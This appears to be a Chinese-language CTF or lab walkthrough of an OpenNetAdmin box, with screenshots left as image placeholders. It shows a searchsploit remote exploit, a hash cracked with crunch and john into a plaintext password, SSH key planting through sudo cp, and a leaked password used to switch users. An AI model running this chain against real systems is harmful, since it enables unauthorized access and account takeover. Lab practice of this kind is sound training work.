nmap -A -p- 扫描端口
image.png
访问一下,哎,这不是 openadmin 嘛
image.png
searchsploit opennetadmin,然后把搜出来的那个复制出来 searchsploit -m 47691
image.png
可能会有些问题,复制出来一份给他权限再执行就没问题了
image.png
find / -type f -user www-data
看一下,那些文件是 www-data 可以读的
image.png
image.png
得到 douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 保存为 hash.txt
同时提到是 10 位数的密码,所以 crunch 10 10 aefhrt > dict.txt
john 爆破一下 john –wordlist=dict.txt hash.txt
image.png
douglas:fatherrrrr ssh 登录一下
image.png
sudo -l 看一下,发现可以不用密码来执行 jen 用户的 cp
image.png
ssh-keygen -t rsa
cp /home/douglas/.ssh/hack.pub /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
image.png
使用刚才生成的密钥登录
ssh jen@192.168.149.169 -i /home/douglas/.ssh/hack
image.png
看一下右键,他告诉我们 Moss’s password is now Fire!Fire!
image.png
我们 su 切换账户
image.png
emmmm,好随意
image.png
image.png
